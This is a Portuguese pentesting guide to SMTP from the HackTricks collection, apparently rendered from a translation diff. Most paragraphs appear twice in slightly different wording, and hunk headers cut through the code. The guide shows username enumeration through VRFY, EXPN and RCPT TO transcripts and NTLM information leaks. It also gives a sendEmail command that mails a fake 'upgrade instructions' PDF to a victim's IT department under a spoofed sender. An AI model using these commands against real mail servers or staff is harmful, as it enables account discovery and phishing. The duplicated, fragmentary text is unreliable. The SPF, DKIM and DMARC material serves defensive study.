* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
**Configuração imediatamente disponível para avaliação de vulnerabilidade e pentesting**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde reconhecimento até relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para investigar mais a fundo, explorar vulnerabilidades e se divertir.
**Configuração instantaneamente disponível para avaliação de vulnerabilidades e teste de penetração**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde a reconstrução até a geração de relatórios. Não substituímos os pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para aprofundar, abrir shells e se divertir.
{% embed url="https://pentest-tools.com/" %}
## **Informações Básicas**
**SMTP (Simple Mail Transfer Protocol)** é um protocolo TCP/IP utilizado no **envio** e recebimento de **e-mails**. No entanto, como é limitado na sua capacidade de enfileirar mensagens no final de recebimento, geralmente é usado com um dos dois outros protocolos, POP3 ou IMAP, que permitem ao usuário salvar mensagens em uma caixa de correio do servidor e baixá-las periodicamente do servidor.
**SMTP (Simple Mail Transfer Protocol)** é um protocolo TCP/IP usado para **enviar** e receber **e-mails**. No entanto, como é limitado em sua capacidade de enfileirar mensagens no destino, geralmente é usado com um dos outros dois protocolos, POP3 ou IMAP, que permitem ao usuário salvar mensagens em uma caixa de correio do servidor e baixá-las periodicamente do servidor.
Em outras palavras, **os usuários tipicamente utilizam** um programa que usa **SMTP para enviar e-mails** e **POP3 ou IMAP para receber** e-mails. Em sistemas baseados em Unix, **sendmail** é o servidor SMTP mais utilizado para e-mails. Um pacote comercial, Sendmail, inclui um servidor POP3. **Microsoft Exchange** inclui um servidor SMTP e também pode ser configurado para incluir suporte POP3.\
Em outras palavras, **os usuários geralmente usam** um programa que usa **SMTP para enviar e-mails** e **POP3 ou IMAP para receber** e-mails. Em sistemas baseados em Unix, **sendmail** é o servidor SMTP mais amplamente utilizado para e-mails. Um pacote comercial, Sendmail, inclui um servidor POP3. **Microsoft Exchange** inclui um servidor SMTP e também pode ser configurado para incluir suporte POP3.\
De [aqui](https://whatis.techtarget.com/definition/SMTP-Simple-Mail-Transfer-Protocol).
**Porta padrão:** 25,465(ssl),587(ssl)
@ -34,23 +34,25 @@ PORT STATE SERVICE REASON VERSION
```
### Cabeçalhos de EMAIL
Se você tiver a oportunidade de **fazer a vítima enviar-lhe um email** (através do formulário de contato da página web, por exemplo), faça isso porque **você poderá aprender sobre a topologia interna** da vítima observando os cabeçalhos do email.
Se tiver a oportunidade de **fazer a vítima enviar-lhe um email** (através do formulário de contato da página da web, por exemplo), faça-o porque **poderá aprender sobre a topologia interna** da vítima ao ver os cabeçalhos do email.
Você também pode obter um email de um servidor SMTP tentando **enviar para esse servidor um email para um endereço inexistente** (porque o servidor enviará ao atacante um email de NDN). Mas, certifique-se de que você envia o email de um endereço permitido (verifique a política de SPF) e que você pode receber mensagens de NDN.
Também pode obter um email de um servidor SMTP tentando **enviar para esse servidor um email para um endereço inexistente** (porque o servidor enviará ao atacante um email NDN). No entanto, certifique-se de enviar o email de um endereço permitido (verifique a política SPF) e de que pode receber mensagens NDN.
Você também deve tentar **enviar conteúdos diferentes porque pode encontrar informações mais interessantes** nos cabeçalhos como: `X-Virus-Scanned: by av.domain.com`\
Você deve enviar o arquivo de teste EICAR.\
Detectar o **AV** pode permitir que você explore **vulnerabilidades conhecidas.**
Também deve tentar **enviar conteúdos diferentes porque pode encontrar informações mais interessantes** nos cabeçalhos como: `X-Virus-Scanned: by av.domain.com`\
Deve enviar o arquivo de teste EICAR.\
Detectar o **AV** pode permitir que explore **vulnerabilidades conhecidas.**
## Ações Básicas
### **Captura de Banner/Conexão Básica**
### **Banner Grabbing/Conexão Básica**
**SMTP:**
```bash
nc -vn <IP> 25
```
**SMTPS**:
SMTPS (Simple Mail Transfer Protocol Secure) é uma extensão do protocolo SMTP que adiciona uma camada de segurança usando SSL/TLS para criptografar a comunicação entre o cliente de email e o servidor de email.
```bash
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
@ -64,9 +66,9 @@ dig +short mx google.com
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### NTLM Auth - Divulgação de Informações
### NTLM Auth - Divulgação de informações
Se o servidor suporta autenticação NTLM (Windows), você pode obter informações sensíveis (versões). Mais informações [**aqui**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
Se o servidor suporta autenticação NTLM (Windows) você pode obter informações sensíveis (versões). Mais informações [**aqui**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
```bash
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
@ -77,7 +79,7 @@ NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
```
Ou **automatize** isso com o plugin do **nmap** `smtp-ntlm-info.nse`
Ou **automatize** isso com o plugin **nmap** `smtp-ntlm-info.nse`
### Nome do servidor interno - Divulgação de informações
@ -104,7 +106,7 @@ MAIL FROM: me
Verifique se você consegue capturar alguma senha dos pacotes para a porta 25
### [Auth bruteforce](../../generic-methodologies-and-resources/brute-force.md#smtp)
### [Bruteforce de Autenticação](../../generic-methodologies-and-resources/brute-force.md#smtp)
## Enumeração de Bruteforce de Nome de Usuário
@ -112,15 +114,15 @@ Verifique se você consegue capturar alguma senha dos pacotes para a porta 25
### RCPT TO
```bash
$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
250 myhost Hello 18.28.38.48, pleased to meet you
MAIL FROM:example@domain.com
250 2.1.0 example@domain.com... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
@ -129,26 +131,30 @@ RCPT TO:ed
250 2.1.5 ed... Recipient ok
```
### VRFY
```
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
VRFY (Verify) é um comando SMTP que é usado para verificar se um usuário específico existe em um servidor de e-mail. Esse comando pode ser explorado por atacantes para obter informações sobre usuários válidos em um domínio, o que pode ser útil para futuros ataques de engenharia social ou phishing. É altamente recomendado desabilitar o comando VRFY para evitar vazamento de informações sensíveis.
```bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
250 myhost Hello 18.28.38.48, pleased to meet you
VRFY root
250 Super-User <root@myhost>
250 Super-User root@myhost
VRFY blah
550 blah... User unknown
```
### EXPN
```
$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
O comando `EXPN` é usado para verificar se um endereço de e-mail específico é válido e para expandir uma lista de discussão. Este comando pode revelar informações sobre os usuários e endereços de e-mail válidos em um servidor SMTP. No entanto, muitos servidores SMTP desativam esse comando devido a preocupações com privacidade e segurança.
```bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
@ -157,12 +163,10 @@ HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <ed.williams@myhost>
250 2.1.5 ed.williams@myhost
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
250 2.1.5 sshd privsep sshd@myhost
```
Extraído de: [https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/](https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/)
### Ferramentas automáticas
```
Metasploit: auxiliary/scanner/smtp/smtp_enum
@ -171,17 +175,17 @@ Nmap: nmap --script smtp-enum-users <IP>
```
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
**Configuração imediatamente disponível para avaliação de vulnerabilidade e pentesting**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde reconhecimento até relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para lhes dar mais tempo para investigar mais a fundo, explorar sistemas e se divertir.
**Configuração instantaneamente disponível para avaliação de vulnerabilidades e teste de penetração**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde a reconstrução até a geração de relatórios. Não substituímos os pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para aprofundar, abrir shells e se divertir.
{% embed url="https://pentest-tools.com/" %}
## Relatórios DSN
**Relatórios de Notificação de Status de Entrega**: Se você enviar um **email** para uma organização com um **endereço inválido**, a organização notificará que o endereço foi invalidado enviando um **email de volta para você**. Os **cabeçalhos** do email retornado **conterão** possíveis **informações sensíveis** (como o endereço IP dos serviços de email que interagiram com os relatórios ou informações do software antivírus).
**Relatórios de Notificação de Status de Entrega**: Se você enviar um **e-mail** para uma organização com um **endereço inválido**, a organização notificará que o endereço estava inválido enviando um **e-mail de volta para você**. **Cabeçalhos** do e-mail retornado irão **conter** possíveis **informações sensíveis** (como endereço IP dos serviços de e-mail que interagiram com os relatórios ou informações de software antivírus).
## [Comandos](smtp-commands.md)
### Enviando um Email do console linux
### Enviando um e-mail a partir do console do Linux
```
root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
@ -201,7 +205,7 @@ swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --hea
```
### Enviando um Email com Python
Aqui está uma maneira alternativa de enviar um email com um script python
Aqui está uma maneira alternativa de enviar um email com um script em python
```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
@ -244,148 +248,149 @@ server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))
```
## Falsificação de E-mail
## Contramedidas de Spoofing de E-mail
A maior parte desta seção foi extraída do livro **Network Security Assessment 3rd Edition**.
As organizações são impedidas de ter e-mails não autorizados enviados em seu nome ao empregar **SPF**, **DKIM** e **DMARC** devido à facilidade de spoofing de mensagens SMTP.
As mensagens SMTP são facilmente falsificadas, e por isso as organizações utilizam recursos **SPF**, **DKIM** e **DMARC** para impedir que partes não autorizadas enviem e-mails.
Um **guia completo dessas contramedidas** pode ser encontrado em [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/)
Um **guia completo dessas contramedidas** está disponível em [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
### SPF
{% hint style="danger" %}
SPF [foi "descontinuado" em 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Isso significa que, em vez de criar um **registro TXT** em `_spf.domain.com`, você o cria em `domain.com` usando a **mesma sintaxe**.\
O SPF [foi "descontinuado" em 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Isso significa que, em vez de criar um registro **TXT** em `_spf.domain.com`, você o cria em `domain.com` usando a **mesma sintaxe**.\
Além disso, para reutilizar registros SPF anteriores, é bastante comum encontrar algo como `"v=spf1 include:_spf.google.com ~all"`
{% endhint %}
**Sender Policy Framework** (SPF) fornece um mecanismo que permite aos MTAs verificar se um host que envia um e-mail está autorizado.\
Então, as organizações podem definir uma lista de servidores de e-mail autorizados e os MTAs podem consultar essas listas para verificar se o e-mail foi falsificado ou não.\
Para definir endereços/ranges de IP, domínios e outros que estão **autorizados a enviar e-mails em nome de um nome de domínio**, diferentes "**Mecanismos**" podem aparecer no registro SPF.
O **Sender Policy Framework** (SPF) é um mecanismo que permite aos Agentes de Transferência de E-mail (MTAs) verificar se um host que envia um e-mail está autorizado, consultando uma lista de servidores de e-mail autorizados definidos pelas organizações. Esta lista, que especifica endereços IP/faixas, domínios e outras entidades **autorizadas a enviar e-mails em nome de um nome de domínio**, inclui vários "**Mecanismos**" no registro SPF.
#### Mecanismos
| Mecanismo | Descrição |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL | Sempre corresponde; usado para um resultado padrão como `-all` para todos os IPs não correspondidos pelos mecanismos anteriores. |
| A | Se o nome do domínio tem um registro de endereço (A ou AAAA) que pode ser resolvido para o endereço do remetente, ele corresponderá. |
| IP4 | Se o remetente está em uma determinada faixa de endereços IPv4, corresponde. |
| IP6 | Se o remetente está em uma determinada faixa de endereços IPv6, corresponde. |
| MX | Se o nome do domínio tem um registro MX que resolve para o endereço do remetente, ele corresponderá (ou seja, o e-mail vem de um dos servidores de e-mail de entrada do domínio). |
| PTR | Se o nome do domínio (registro PTR) para o endereço do cliente está no domínio dado e esse nome de domínio resolve para o endereço do cliente (DNS reverso confirmado), corresponde. Este mecanismo é desencorajado e deve ser evitado, se possível. |
| EXISTS | Se o nome do domínio dado resolve para qualquer endereço, corresponde (não importa para qual endereço ele resolve). Isso é raramente usado. Junto com a linguagem de macro SPF, oferece correspondências mais complexas como consultas DNSBL. |
| INCLUDE | Faz referência à política de outro domínio. Se a política desse domínio passar, este mecanismo passa. No entanto, se a política incluída falhar, o processamento continua. Para delegar completamente a política de outro domínio, a extensão de redirecionamento deve ser usada. |
| REDIRECT | <p>Um redirecionamento é um ponteiro para outro nome de domínio que hospeda uma política SPF, permite que vários domínios compartilhem a mesma política SPF. É útil ao trabalhar com uma grande quantidade de domínios que compartilham a mesma infraestrutura de e-mail.</p><p>A política SPF do domínio indicado no Mecanismo de redirecionamento será usada.</p> |
| ALL | Sempre corresponde; usado para um resultado padrão como `-all` para todos os IPs não correspondidos pelos mecanismos anteriores. |
| A | Se o nome de domínio tiver um registro de endereço (A ou AAAA) que possa ser resolvido para o endereço do remetente, corresponderá. |
| IP4 | Se o remetente estiver em uma determinada faixa de endereços IPv4, corresponderá. |
| IP6 | Se o remetente estiver em uma determinada faixa de endereços IPv6, corresponderá. |
| MX | Se o nome de domínio tiver um registro MX que resolva para o endereço do remetente, corresponderá (ou seja, o e-mail vem de um dos servidores de e-mail de entrada do domínio). |
| PTR | Se o nome de domínio (registro PTR) para o endereço do cliente estiver no domínio fornecido e esse nome de domínio resolver para o endereço do cliente (DNS reverso confirmado para frente), corresponderá. Esse mecanismo é desencorajado e deve ser evitado, se possível. |
| EXISTS | Se o nome de domínio fornecido resolver para qualquer endereço, corresponderá (não importa o endereço para o qual ele resolva). Isso é raramente usado. Juntamente com a linguagem macro SPF, oferece correspondências mais complexas como consultas DNSBL. |
| INCLUDE | Faz referência à política de outro domínio. Se a política desse domínio passar, este mecanismo passa. No entanto, se a política incluída falhar, o processamento continuará. Para delegar totalmente para a política de outro domínio, a extensão de redirecionamento deve ser usada. |
| REDIRECT | <p>Um redirecionamento é um apontador para outro nome de domínio que hospeda uma política SPF, permitindo que vários domínios compartilhem a mesma política SPF. É útil ao trabalhar com uma grande quantidade de domínios que compartilham a mesma infraestrutura de e-mail.</p><p>A política SPF do domínio indicado no Mecanismo de redirecionamento será usada.</p> |
Também é possível identificar **Qualificadores** que indicam **o que deve ser feito se um mecanismo corresponder**. Por padrão, o **qualificador "+"** é usado (então, se qualquer mecanismo corresponder, isso significa que é permitido).\
Você geralmente notará **no final de cada política SPF** algo como: **\~all** ou **-all**. Isso é usado para indicar que **se o remetente não corresponder a nenhuma política SPF, você deve marcar o e-mail como não confiável (\~) ou rejeitar (-) o e-mail.**
Também é possível identificar **Qualificadores** que indicam **o que deve ser feito se um mecanismo for correspondido**. Por padrão, o **qualificador "+"** é usado (então se algum mecanismo for correspondido, isso significa que é permitido).\
Geralmente, você notará **no final de cada política SPF** algo como: **\~all** ou **-all**. Isso é usado para indicar que **se o remetente não corresponder a nenhuma política SPF, você deve marcar o e-mail como não confiável (\~) ou rejeitar (-) o e-mail.**
#### Qualificadores
Cada mecanismo pode ser combinado com um dos quatro qualificadores:
Cada mecanismo dentro da política pode ser prefixado por um dos quatro qualificadores para definir o resultado pretendido:
* **`+`** para um resultado PASS. Isso pode ser omitido; por exemplo, `+mx` é o mesmo que `mx`.
* **`?`** para um resultado NEUTRAL interpretado como NONE (sem política).
* **`~`** (tilde) para SOFTFAIL, um auxílio de depuração entre NEUTRAL e FAIL. Tipicamente, mensagens que retornam um SOFTFAIL são aceitas, mas marcadas.
* **`-`** (menos) para FAIL, o e-mail deve ser rejeitado (veja abaixo).
* **`+`**: Corresponde a um resultado PASS. Por padrão, os mecanismos assumem este qualificador, tornando `+mx` equivalente a `mx`.
* **`?`**: Representa um resultado NEUTRO, tratado de forma semelhante a NENHUM (nenhuma política específica).
* **`~`**: Denota SOFTFAIL, servindo como um meio-termo entre NEUTRO e FALHA. E-mails que atendem a este resultado geralmente são aceitos, mas marcados de acordo.
* **`-`**: Indica FALHA, sugerindo que o e-mail deve ser rejeitado diretamente.
No exemplo a seguir, você pode ler a **política SPF do google.com**. Note como a **primeira política SPF inclui políticas SPF de outros domínios:**
No exemplo a seguir, a **política SPF do google.com** é ilustrada. Observe a inclusão de políticas SPF de diferentes domínios dentro da primeira política SPF:
```shell-session
kali@kali:~$ dig txt google.com | grep spf
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
kali@kali:~$ dig txt _spf.google.com | grep spf
dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com. IN TXT
_spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
kali@kali:~$ dig txt _netblocks.google.com | grep spf
dig txt _netblocks.google.com | grep spf
_netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
kali@kali:~$ dig txt _netblocks2.google.com | grep spf
dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
kali@kali:~$ dig txt _netblocks3.google.com | grep spf
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
```
Tradicionalmente era possível falsificar qualquer nome de domínio que não tivesse um registro SPF correto/ou nenhum registro SPF. **Atualmente**, se um **email** vier de um **domínio sem um registro SPF válido** provavelmente será **rejeitado/marcado como não confiável automaticamente**.
Tradicionalmente era possível falsificar qualquer nome de domínio que não tivesse um registro SPF correto/qualquer. **Hoje em dia**, se um **e-mail** vem de um **domínio sem um registro SPF válido**, provavelmente será **rejeitado/marcado como não confiável automaticamente**.
Para verificar o SPF de um domínio, você pode usar ferramentas online como: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
### DKIM
### DKIM (DomainKeys Identified Mail)
DomainKeys Identified Mail (DKIM) é um mecanismo pelo qual **emails enviados são assinados e validados por MTAs estrangeiros ao recuperar a chave pública de um domínio via DNS**. A chave pública DKIM é mantida dentro de um registro TXT para um domínio; no entanto, você deve saber tanto o seletor quanto o nome do domínio para recuperá-la.
O DKIM é utilizado para assinar e-mails de saída, permitindo sua validação por Agentes de Transferência de E-mail (MTAs) externos por meio da recuperação da chave pública do domínio no DNS. Esta chave pública está localizada em um registro TXT do domínio. Para acessar essa chave, é necessário conhecer tanto o seletor quanto o nome de domínio.
Então, para solicitar a chave, você precisa do nome do domínio e do seletor do email do cabeçalho do email `DKIM-Signature` por exemplo: `d=gmail.com;s=20120113`
Por exemplo, para solicitar a chave, o nome de domínio e o seletor são essenciais. Estes podem ser encontrados no cabeçalho do e-mail `DKIM-Signature`, por exemplo, `d=gmail.com;s=20120113`.
Um comando para buscar estas informações pode se parecer com:
```bash
dig 20120113._domainkey.gmail.com TXT | grep p=
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCg
KCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
```
### DMARC
### DMARC (Domain-based Message Authentication, Reporting & Conformance)
Domain-based Message Authentication, Reporting & Conformance (DMARC) é um método de autenticação de e-mail que expande o SPF e o DKIM. Políticas instruem servidores de e-mail sobre como processar e-mails para um determinado domínio e relatar as ações realizadas.
![](<../../.gitbook/assets/image (134).png>)
O DMARC melhora a segurança de e-mails baseando-se nos protocolos SPF e DKIM. Ele define políticas que orientam os servidores de e-mail no tratamento de e-mails de um domínio específico, incluindo como lidar com falhas de autenticação e para onde enviar relatórios sobre ações de processamento de e-mails.
**Para obter o registro DMARC, você precisa consultar o subdomínio \_dmarc**
```shell-session
root@kali:~# dig _dmarc.yahoo.com txt | grep DMARC
_dmarc.yahoo.com. 1785 IN TXT "v=DMARC1\; p=reject\; sp=none\; pct=100\;
rua=mailto:dmarc-yahoo-rua@yahoo-inc.com, mailto:dmarc_y_rua@yahoo.com\;"
```bash
# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com. 3600 IN TXT "v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"
root@kali:~# dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com. 600 IN TXT "v=DMARC1\; p=quarantine\; rua=mailto:mailauth-reports@google.com"
# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"
root@kali:~# dig _dmarc.paypal.com txt | grep DMARC
_dmarc.paypal.com. 300 IN TXT "v=DMARC1\; p=reject\; rua=mailto:d@rua.agari.com\;
ruf=mailto:dk@bounce.paypal.com,mailto:d@ruf.agari.com"
# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
```
#### Tags DMARC
#### Tags do DMARC
| Nome da Tag | Propósito | Exemplo |
| ----------- | ----------------------------------------------- | -------------------------------- |
| v | Versão do protocolo | v=DMARC1 |
| pct | Percentagem de mensagens sujeitas a filtragem | pct=20 |
| ruf | URI de relatório para relatórios forenses | ruf=mailto:authfail@example.com |
| rua | URI de relatório de relatórios agregados | rua=mailto:aggrep@example.com |
| p | Política para o domínio organizacional | p=quarantine |
| sp | Política para subdomínios do DO | sp=reject |
| adkim | Modo de alinhamento para DKIM | adkim=s |
| aspf | Modo de alinhamento para SPF | aspf=r |
| Nome da Tag | Propósito | Exemplo |
| ----------- | ---------------------------------------------- | ------------------------------- |
| v | Versão do protocolo | v=DMARC1 |
| pct | Percentual de mensagens sujeitas a filtragem | pct=20 |
| ruf | URI de relatório para relatórios forenses | ruf=mailto:authfail@example.com |
| rua | URI de relatório de relatórios agregados | rua=mailto:aggrep@example.com |
| p | Política para o domínio organizacional | p=quarantine |
| sp | Política para subdomínios do DO | sp=reject |
| adkim | Modo de alinhamento para DKIM | adkim=s |
| aspf | Modo de alinhamento para SPF | aspf=r |
### **E quanto a Subdomínios?**
### **E quanto aos Subdomínios?**
**De** [**aqui**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
Você precisa ter registros SPF separados para cada subdomínio do qual deseja enviar e-mails.\
O seguinte foi originalmente postado em openspf.org, que costumava ser um ótimo recurso para esse tipo de informação.
O seguinte foi originalmente postado em openspf.org, que costumava ser um ótimo recurso para esse tipo de coisa.
> A Questão Demoníaca: E quanto a subdomínios?
> A Questão do Demônio: E quanto aos subdomínios?
>
> Se eu receber um e-mail de pielovers.demon.co.uk, e não houver dados SPF para pielovers, devo voltar um nível e testar o SPF para demon.co.uk? Não. Cada subdomínio na Demon é um cliente diferente, e cada cliente pode ter sua própria política. Não faria sentido a política da Demon aplicar-se a todos os seus clientes por padrão; se a Demon quiser fazer isso, ela pode configurar registros SPF para cada subdomínio.
> Se eu receber um e-mail de pielovers.demon.co.uk e não houver dados SPF para pielovers, devo voltar um nível e testar o SPF para demon.co.uk? Não. Cada subdomínio no Demon é um cliente diferente, e cada cliente pode ter sua própria política. Não faria sentido a política do Demon se aplicar a todos os seus clientes por padrão; se o Demon quiser fazer isso, ele pode configurar registros SPF para cada subdomínio.
>
> Portanto, o conselho para publicadores de SPF é o seguinte: você deve adicionar um registro SPF para cada subdomínio ou nome de host que tenha um registro A ou MX.
> Portanto, o conselho para os publicadores de SPF é o seguinte: você deve adicionar um registro SPF para cada subdomínio ou nome de host que tenha um registro A ou MX.
>
> Sites com registros A ou MX curinga também devem ter um registro SPF curinga, da forma: \* IN TXT "v=spf1 -all"
> Sites com registros A ou MX curinga também devem ter um registro SPF curinga, no formato: \* IN TXT "v=spf1 -all"
Isso faz sentido - um subdomínio pode muito bem estar em uma localização geográfica diferente e ter uma definição de SPF muito diferente.
Isso faz sentido - um subdomínio pode muito bem estar em uma localização geográfica diferente e ter uma definição SPF muito diferente.
### **Open Relay**
### **Relé Aberto**
Para evitar que os e-mails enviados sejam filtrados pelos filtros de spam e não cheguem ao destinatário, o remetente pode usar um **servidor de retransmissão que o destinatário confia**. Muitas vezes, os administradores **não têm uma visão geral** de quais faixas de **IP** eles têm que **permitir**. Isso resulta em uma má configuração do servidor SMTP que ainda encontraremos frequentemente em testes de penetração externos e internos. Portanto, eles **permitem todos os endereços IP** para não causar erros no tráfego de e-mails e assim não perturbar ou interromper involuntariamente a comunicação com clientes potenciais e atuais.
```shell-session
O uso de um **servidor de retransmissão confiável pelo destinatário** pode ser uma estratégia para garantir que os e-mails enviados não sejam marcados como spam e alcancem seu destino pretendido. No entanto, observou-se que os administradores frequentemente não possuem um entendimento detalhado das **faixas de IP** que devem ser **permitidas**. Essa lacuna de conhecimento pode levar a configurações incorretas no servidor SMTP, uma vulnerabilidade comumente descoberta durante testes de penetração externos e internos. Para contornar esse problema e evitar interrupções inadvertidas na comunicação por e-mail com clientes potenciais e existentes, os administradores podem optar por **permitir todos os endereços IP**. Essa abordagem é refletida na configuração do servidor SMTP, onde o parâmetro `mynetworks` é configurado para permitir conexões de qualquer endereço IP:
```bash
mynetworks = 0.0.0.0/0
```
Para testar se há um relay de e-mail aberto, uma ferramenta como `nmap` pode ser utilizada. Essa ferramenta é empregada para escanear o servidor alvo em busca da possibilidade de ele funcionar como um relay aberto, o que pode ser indicado pelo script de relay aberto `smtp-open-relay`. O comando a seguir demonstra como o `nmap` é usado para escanear a porta 25 no servidor com o endereço IP 10.10.10.10, fornecendo uma saída detalhada:
```bash
nmap -p 25 --script smtp-open-relay -v 10.10.10.10
```
```bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### **Ferramentas**
* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Verificar configurações incorretas de SPF e DMARC**
* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Obter automaticamente configurações de SPF e DMARC**
* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Verifique as configurações erradas de SPF e DMARC**
* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Obtenha automaticamente as configurações de SPF e DMARC**
### Enviar Email Falso
### Enviar E-mail Falso
